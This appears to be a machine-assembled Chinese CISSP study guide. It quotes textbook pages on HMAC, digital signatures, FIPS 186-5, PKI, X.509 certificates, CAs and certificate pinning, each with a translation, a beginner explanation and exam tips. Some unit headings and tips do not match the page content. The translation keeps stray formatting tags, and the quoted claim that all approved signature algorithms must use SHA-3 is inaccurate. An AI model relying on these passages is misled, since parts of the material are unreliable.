对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
学习单元 19 / PDF P445

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

Which Key Should I Use? If you're new to public key cryptography, selecting the correct key for various applications can be quite confusing. Encryption, decryption, message signing, and signature verification all use the same algorithm with different key inputs. Here are a few simple rules to help keep these concepts straight in your mind: If you want to encrypt a confidential message, use the recipient's public key. If you want to decrypt a confidential message sent to you, use your private key. If you want to digitally sign a message you are sending to someone else, use your private key.

If you want to verify the digital signature on a message sent by someone else, use the sender's public key. These four rules are the core principles of public key cryptography and digital signatures. If you understand each of them, you're off to a great start. HMAC can be combined with any standard hash function, such as MD5, SHA- 2, or SHA-3, by using a shared secret key. Therefore, only communicating parties who know the secret key can generate or verify the partial digital signature. If the recipient decrypts the message digest but cannot successfully compare it to a message digest generated from the original plaintext message, that means the message was altered in transit.

Because HMAC relies on a shared secret key, it does not provide any nonrepudiation functionality (as previously mentioned). However, it operates in a more efficient manner than the digital signature standard (DSS) described in the following section and may be suitable for applications in which symmetric key cryptography is appropriate. In short, HMAC represents a halfway point between the unencrypted use of a hash function and the computationally expensive digital signature algorithms (DSA) based on public key cryptography. Digital Signature Standard

中文直译 / 整理

我应该使用哪个密钥? 如果您刚接触公钥加密,为各种应用选择正确的密钥可能会非常令人困惑。 加密、解密、消息签名和签名验证都使用相同的算法,但密钥输入不同。 以下是一些简单的规则,帮助您在脑海中理清这些概念: If y如果你想加密一条机密消息,请使用收件人的 公钥。 如果你想解密发送给你的机密消息,请使用你的私钥。 如果你想对发送给别人的消息进行数字签名,请使用你的私钥。 如果你想验证别人发送的消息的数字签名,请使用发送者的公钥。 这四条规则是公钥加密和数字签名的核心原则。 如果你理解了每一条, 你就已经迈出了很好的一步。 HMAC 可以通过使用共享密钥与任何标准哈希函数(如 MD5、SHA‑2 或 SHA‑3)结合使用。 因此,只有知道密钥的通信双方才能生成或验证 部分 数字 签名。 如果接收方解密了消息摘要,但无法成功将其与从原始明文消息生成的 消息摘要进行比较,则意味着消息在传输过程中被篡改。 由于HMAC依赖于共享密钥,因此不提供任何不可否认性性功能(如前所述)。 然而,它的运行效率高于下文所述的数字签名标准(DSS),在适合使用对称 密钥加密的应用中可能更为适用。

简而言之,HMAC代表了哈希函数未加密使 用与基于公钥加密的计算开销较大的数字签名算法(DSA)之间的折中方案。 数字签名标准

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 20 / PDF P446

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

NIST specifies the digital signature algorithms acceptable for federal government use in FIPS 186-5, also known as the Digital Signature Standard (DSS). This document specifies that all federally approved digital signature algorithms must use the SHA-3 hashing functions. DSS also specifies the encryption algorithms that can be used to support a digital signature infrastructure. There are three currently approved standard encryption algorithms in FIPS 186-5: The Rivest–Shamir–Adleman (RSA) digital signature algorithm, as specified in IETF RFC 8017. The Elliptic Curve Digital Signature Algorithm (ECDSA), as specified in FIPS 186-5. This algorithm provides inherent support for nonrepudiation.

The Edwards Curve Digital Signature Algorithm (EdDSA), as specified in IETF RFC 8032. Public Key Infrastructure The major strength of public key encryption is its ability to facilitate communication between parties previously unknown to each other. This is made possible by the public key infrastructure (PKI) hierarchy of trust relationships. These trusts permit combining asymmetric cryptography with symmetric cryptography along with hashing and digital certificates, giving us hybrid cryptography. In the following sections, you'll learn the basic components of the public key infrastructure and the cryptographic concepts that make secure global communications possible.

You'll learn the composition of a digital certificate, the role of certificate authorities, and the process used to generate and destroy digital certificates. Certificates Digital certificates provide communicating parties with the assurance that the people they are communicating with truly are who they claim to be. Digital certificates are essentially endorsed copies of an individual's public key. When users verify that a certificate was signed by a trusted certificate authority (CA), they know that the public key is legitimate. NIST

中文直译 / 整理

在FIPS 186‑5(又称数字签名标准(DSS))中规定了联邦政府可使用 的数字签名算法。 该文件规定,所有经联邦批准的数字签名算法必须使用 SHA‑3哈希函数。 DSS 还规定了可用于支持数字签名基础设施的加密算法。 FIPS 186‑5 中当前 批准的三种标准加密算法为: Rivest–Shamir–Adleman(RSA)数字签名算法,如 IETF RFC 8017 所规定。 椭圆曲线数字签名算法(ECDSA),如 FIPS 186‑5 所规定。 该算法天 然支持不可否认性性。 爱德华兹曲线数字签名算法(EdDSA),如 IETF RFC 8032 所规定。 公钥基础设施 公钥加密的主要优势在于其能够促进此前互不相识的各方之间的通信。 这得益 于 公钥基础设施(PKI) 的信任层级结构。 这些信任关系使得非对称加密与对 称加密、哈希和数字证书相结合,从而实现了混合加密。 在以下章节中,您将学习公钥基础设施的基本组件以及使安全全球通信成为可 能的加密概念。 您将了解数字证书的组成、证书颁发机构的作用,以及生成和 销毁数字证书的过程。 证书 数字证书为通信双方提供保障,确保他们通信的对象确实是其声称的身份。

数 字证书本质上是个人公钥的经过认证的副本。 当用户验证证书是由受信任的证 书颁发机构(CA)签名时,他们就知道该公钥是合法的。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 21 / PDF P447

第 447 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Digital certificates contain specific identifying information, and their construction is governed by the International Telecommunications Union (ITU), an international standard—X.509.

Certificates that conform to X.509 contain the following data: Version of X.509 to which the certificate conforms Serial number (from the certificate creator) Signature algorithm identifier (specifies the technique used by the certificate authority to digitally sign the contents of the certificate) Issuer name (identification of the certificate authority [CA] that issued the certificate) Validity period (specifies the dates and times—a starting date and time and an expiration date and time—during which the certificate is valid) Subject's name (contains the common name [CN] of the certificate as well as the distinguished name [DN] of the entity that owns the public key contained in the certificate) Subject's public key (the meat of the certificate—the actual public key the certificate owner used to set up secure communications) Certificates may be issued for a variety of purposes.

These include providing assurance for the public keys of: Computers/machines Individual users Email addresses Developers (code-signing certificates) The subject of a certificate may include a wildcard in the certificate name, indicating that the certificate is good for subdomains as well. The wildcard is designated by an asterisk character. For example, a wildcard certificate issued to *.example.org would be valid for all of the following domains: example.org www.example.org mail.example.org

中文直译 / 整理

数字证书包含特定的标识信息,其结构由国际电信联盟(ITU)制定的国际 标准——X.509规定。 符合X.509的证书包含以下数据: 证书所遵循的X.509版本 序列号(来自证书创建者) 签名算法标识符(指定证书颁发机构用于对证书内容进行数字签名的技 术) 颁发者名称(标识签发证书的证书颁发机构 [CA] ) 有效期(指定证书有效的起始日期和时间以及过期日期和时间) 主题名称(包含证书的通用名称 [CN] 以及拥有证书中公钥的实体的唯 一名称 [DN] ) 主题的公钥(证书的核心内容——证书所有者用于建立安全通信的实际公钥) 证书可以用于多种目的,包括为以下内容的公钥提供保证: 计算机/设备 个人用户 电子邮件地址 开发者(代码签名证书) 证书的主题可以在证书名称中包含通配符,表示该证书也适用于子域名。 通配 符由星号字符表示。 例如,颁发给 *.example.org 的通配符证书对以下所有域 名均有效: example.org www.example.org mail.example.org

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 447 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

签名支持完整性、真实性和不可否认性,不等于加密全文。

证书不是密钥本身,而是身份与公钥的可信绑定。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
标准 标准给出必须满足的最低要求。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 22 / PDF P448

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

secure.example.org Wildcard certificates are only good for one level of subdomain. Therefore, the *.example.org certificate would not be valid for the www.cissp.example.org subdomain. Certificate Authorities Certificate authorities (CAs) are the glue that binds the public key infrastructure together. These neutral organizations offer notarization services for digital certificates. To obtain a digital certificate from a reputable CA, you must prove your identity to the satisfaction of the CA.

The following list includes some of the major CAs who provide widely accepted digital certificates: IdenTrust AWS Certificate Manager (ACM) GlobalSign ComodoCA Certum GoDaddy DigiCert SECOM Trust Systems Entrust Actalis Trustwave Nothing is preventing any organization from simply setting up shop as a certificate authority. However, the certificates issued by a CA are only as good as the trust placed in the CA that issued them. This is an important item to consider when receiving a digital certificate from a third party. If you don't recognize and trust the name of the CA that issued the certificate, you shouldn't place any trust in the certificate at all.

PKI relies on a hierarchy of secure.example.org

中文直译 / 整理

通配符证书仅对一级子域名有效。 因此, *.example.orgwww.cissp.example.org子域名的证书将无效。 证书颁发机构 证书颁发机构(CA)是将公钥基础设施联系在一起的纽带。 这些中立组织提 供数字证书的公证服务。 要从信誉良好的CA获取数字证书,您必须向CA证明 您的身份并获得其认可。 以下列表包含一些提供广泛接受的数字证书的主要 CA: IdenTrust AWS 证书管理器(ACM) GlobalSign ComodoCA Certum GoDaddy DigiCert SECOM Trust Systems Entrust Actalis Trustwave 没有任何组织被阻止直接设立为证书颁发机构。 然而,由CA签发的证书的好坏, 完全取决于对签发该证书的CA的信任程度。 在接收第三方提供的数字证书时, 这是一个需要认真考虑的重要事项。 如果您不熟悉或不信任签发该证书的CA的 名称,则根本不应信任该证书。 PKI依赖于一个层级结构的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

公钥基础设施 PKI:PKI 用证书、CA、注册、吊销等机制管理公钥信任。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 23 / PDF P449

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

trust relationships. If you configure your browser to trust a CA, it will automatically trust all of the digital certificates issued by that CA. Browser developers preconfigure browsers to trust the major CAs to avoid placing this burden on users. Let's Encrypt is a well-known CA because they offer free certificates in an effort to encourage the use of encryption. You can learn more about this free service at http://letsencrypt.org. Registration authorities (RAs) assist CAs with the burden of verifying users' identities prior to the issuance of digital certificates.

They do not directly issue certificates themselves, but they play an important role in the certification process, allowing CAs to remotely validate user identities. Certificate authorities must carefully protect their own private keys to preserve their trust relationships. To do this, they often use an offline CA to protect their root certificate, the top-level certificate for their entire PKI. This offline CA is disconnected from networks and powered down until it is needed. The offline CA uses the root certificate to create subordinate intermediate CAs that serve as the online CAs used to issue certificates on a routine basis.

In the CA trust model, the use of a series of intermediate CAs is known as certificate chaining. To validate a certificate, the browser verifies the identity of the intermediate CA(s) first and then traces the path of trust back to a known root CA, verifying the identity of each link in the chain of trust. Certificate authorities do not need to be third-party service providers. Many organizations operate internal CAs that provide self-signed certificates for use exclusively inside an organization.

These certificates won't be trusted by the browsers of external users, but internal systems may be configured to trust the internal CA, saving the expense of purchasing certificates from a thirdparty CA. Certificate Life Cycle The technical concepts behind the public key infrastructure (PKI) are relatively simple. In the following sections, we'll cover the processes used by certificate authorities (CAs) to create, validate, and revoke client certificates.

中文直译 / 整理

信任关系。 如果您将浏览器配置为信任某个CA,它将自动信任该CA签发的所 有数字证书。 浏览器开发者预先将浏览器配置为信任主要的CA,以避免将此负 担转嫁给用户。 Let's Encrypt 是一个知名的证书颁发机构(CA),因为他们提供免费证书,以鼓 励使用加密技术。 您可以在 http://letsencrypt.org了解有关这项免费服务的更多信息。 注册机构(RAs)协助证书颁发机构(CAs)在颁发数字证书前验证用户身份。 它们本身不直接颁发证书,但在认证过程中发挥重要作用,使 CAs 能够远程 验证用户身份。 证书颁发机构必须谨慎保护自己的私钥,以维持其信任关系。 为此,它们通常 使用<sty le id='1'>离线 CA来保护其<sty le id='3'>根证书,即其整个 PKI 的 顶级证书。 该离线 CA 断开与网络的连接,并在未使用时关闭电源。 离线 CA 使用根证书创建下属的<sty le id='5'>中间 CA,这些中间 CA 作为<sty le id='7'>在线 CA,用于常规颁发证书。 在 CA 信任模型中,使用一系列中间 CA 的方式被称为<sty le id='1'>证书链。

为了验证证书,浏览器首先验证中间 CA 的身份,然后追溯信任路径,回溯到 已知的根 CA,并验证信任链中每一环节的身份。 证书颁发机构不一定是第三方服务提供商。 许多组织运行内部CA,为组织内部 专用提供自签名证书。 这些证书不会被外部用户的浏览器信任,但内部系统可 以配置为信任内部CA,从而节省从第三方CA购买证书的费用。 证书生命周期 公钥基础设施(PKI)背后的技术概念相对简单。 在以下章节中,我们将介绍 证书颁发机构(CA)创建、验证和吊销客户端证书所使用的过程。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

公钥基础设施 PKI:PKI 用证书、CA、注册、吊销等机制管理公钥信任。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

证书不是密钥本身,而是身份与公钥的可信绑定。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
学习单元 24 / PDF P450

第 450 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Enrollment When you want to obtain a digital certificate, you must first prove your identity to the CA in some manner; this process is called enrollment. As mentioned in the previous section, this sometimes involves physically appearing before an agent of the certificate authority with the appropriate identification documents. Some certificate authorities provide other means of verification, including the use of credit report data and identity verification by trusted community leaders. Once you've satisfied the certificate authority regarding your identity, you provide them with your public key in the form of a certificate signing request (CSR).

The CA next creates an X.509 digital certificate containing your identifying information and a copy of your public key. The CA then digitally signs the certificate using the CA's private key and provides you with a copy of your signed digital certificate. You may then safely distribute this certificate to anyone with whom you want to communicate securely. Certificate authorities issue different types of certificates depending on the level of identity verification that they perform. The simplest, and most common, certificates are Domain Validation (DV) certificates, where the CA simply verifies that the certificate subject has control of the domain name.

Extended Validation (EV) certificates provide a higher level of assurance, and the CA takes steps to verify that the certificate owner is a legitimate business before issuing the certificate. Verification When you receive a digital certificate from someone with whom you want to communicate, you verify the certificate by checking the CA's digital signature using the CA's public key. You then must check the validity period of the certificate to ensure that the current date is after the starting date of the certificate and that the certificate has not yet expired.

Finally, you must check and ensure that the certificate was not revoked using a certificate revocation list (CRL) or the Online Certificate Status Protocol (OCSP). At this point, you may assume that the public key listed on the certificate is authentic, provided that it satisfies the following requirements: The digital signature of the CA is authentic. You trust the CA. The certificate is not listed on a CRL.

中文直译 / 整理

注册 当您希望获取数字证书时,必须以某种方式向CA证明您的身份; 此过程称为注 册。 如前一节所述,这有时需要您亲自携带适当的身份证件前往证书颁发机构 的代理人处。 一些证书颁发机构提供其他验证方式,包括使用信用报告数据以 及由可信赖的社区领袖进行身份验证。 一旦您向证书颁发机构证明了您的身份,您就需要以证书签名请求(CSR)的 形式向其提供您的公钥。 证书颁发机构随后会创建一个包含您身份信息和公钥 副本的X.509数字证书。 接着,证书颁发机构使用其私钥对证书进行数字签名, 并向您提供已签名数字证书的副本。 此后,您可以安全地将此证书分发给任何 您希望安全通信的对象。 证书颁发机构根据其执行的身份验证级别颁发不同类型的证书。 最简单且最常 见的证书是域名验证(DV)证书,其中证书颁发机构仅验证证书主题是否控制 该域名。 扩展验证(EV)证书提供更高水平的保障,证书颁发机构在颁发证书 前会采取措施验证证书所有者是否为合法企业。 验证 当您从希望与之通信的人那里收到数字证书时,您会通过使用证书颁发机构的 公钥来验证该证书的数字签名。 然后,您必须检查证书的有效期,以确保当前 日期在证书起始日期之后且证书尚未过期。

最后,您必须检查并确认证书未被 吊销,方法是查阅证书吊销列表(CRL)或使用在线证书状态协议(OCSP)。 至此,您可以假设证书上列出的公钥是真实的,前提是它满足以下要求: CA 的数字签名是真实的。 您信任该 CA。 该证书未列于CRL中。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 450 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

签名支持完整性、真实性和不可否认性,不等于加密全文。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 25 / PDF P451

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The certificate actually contains the data you are trusting. The last point is a subtle but extremely important item. Before you trust an identifying piece of information about someone, be sure that it is actually contained within the certificate. If a certificate contains the email address (billjones@foo.com) but not the individual's name, you can be certain only that the public key contained therein is associated with that email address. The CA is not making any assertions about the actual identity of the billjones@foo.com email account. However, if the certificate contains the name Bill Jones along with an address and telephone number, the CA is vouching for that information as well.

Digital certificate verification algorithms are built into a number of popular web browsing and email clients, so you won't often need to get involved in the particulars of the process. However, it's important to have a solid understanding of the technical details taking place behind the scenes to make appropriate security judgments for your organization. It's also the reason that, when purchasing a certificate, you choose a CA that is widely trusted. If a CA is not included in, or is later pulled from, the list of CAs trusted by a major browser, it will greatly limit the usefulness of your certificate. In 2017, a significant security failure occurred in the digital certificate industry.

Symantec, through a series of affiliated companies, issued several digital certificates that did not meet industry security standards. In response, Google announced that the Chrome browser would no longer trust Symantec certificates. As a result, Symantec wound up selling off its certificate-issuing business to DigiCert, which agreed to properly validate certificates prior to issuance. This demonstrates the importance of properly validating certificate requests. A series of seemingly small lapses in procedure can decimate a CA's business. Certificate pinning approaches instruct browsers to attach (pin) a certificate to a host for an extended period of time.

When sites use certificate pinning, the browser associates that site (domain or subdomain) with their public key. This allows users or administrators to notice and intervene if a certificate unexpectedly changes. Revocation Occasionally, a certificate authority needs to revoke a certificate. This might occur for one of the following reasons:

中文直译 / 整理

该证书实际上包含您所信任的数据。 最后一个要点是一个微妙但极其重要的事项。 在信任有关某人的身份信息之 前,请确保该信息确实包含在证书中。 如果证书包含电子邮件地址( billjones@foo.com),但不包含个人姓名,则您只能确定其中的公钥与该电 子邮件地址相关联。 CA 并未对 billjones@foo.com 电子邮件账户的实际身份 作出任何声明。 然而,如果证书中包含姓名 Bill Jones 以及地址和电话号码, 则 CA 也会对该信息进行担保。 数字证书验证算法已内置到许多流行的网页浏览器和电子邮件客户端中,因此 您通常无需深入了解该过程的细节。 然而,为了对您的组织做出适当的安全判 断,深入了解后台发生的技术细节至关重要。 这也是在购买证书时选择广泛可 信的 CA 的原因。 如果某个 CA 未被包含在主流浏览器信任的 CA 列表中,或后 来被移除,您的证书将大大失去实用性。 2017年,数字证书行业发生了一次重大的安全故障。 Symantec通过一系列关 联公司颁发了多个不符合行业安全标准的数字证书。 为此,Google宣布 Chrome浏览器将不再信任Symantec的证书。

结果,Symantec最终将其证 书颁发业务出售给了DigiCert,DigiCert同意在颁发证书前进行适当验证。 这 表明了正确验证证书请求的重要性。 一系列看似微小的程序疏漏足以摧毁一个 CA的业务。 证书钉扎方法指示浏览器将证书长期绑定(钉扎)到主机上。 当网站使用证书 钉扎时,浏览器会将该网站(域名或子域名)与其公钥关联起来。 这使得用户 或管理员能够在证书意外更改时察觉并采取干预措施。 吊销 偶尔,证书颁发机构需要吊销证书。 这可能由以下原因之一引起:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
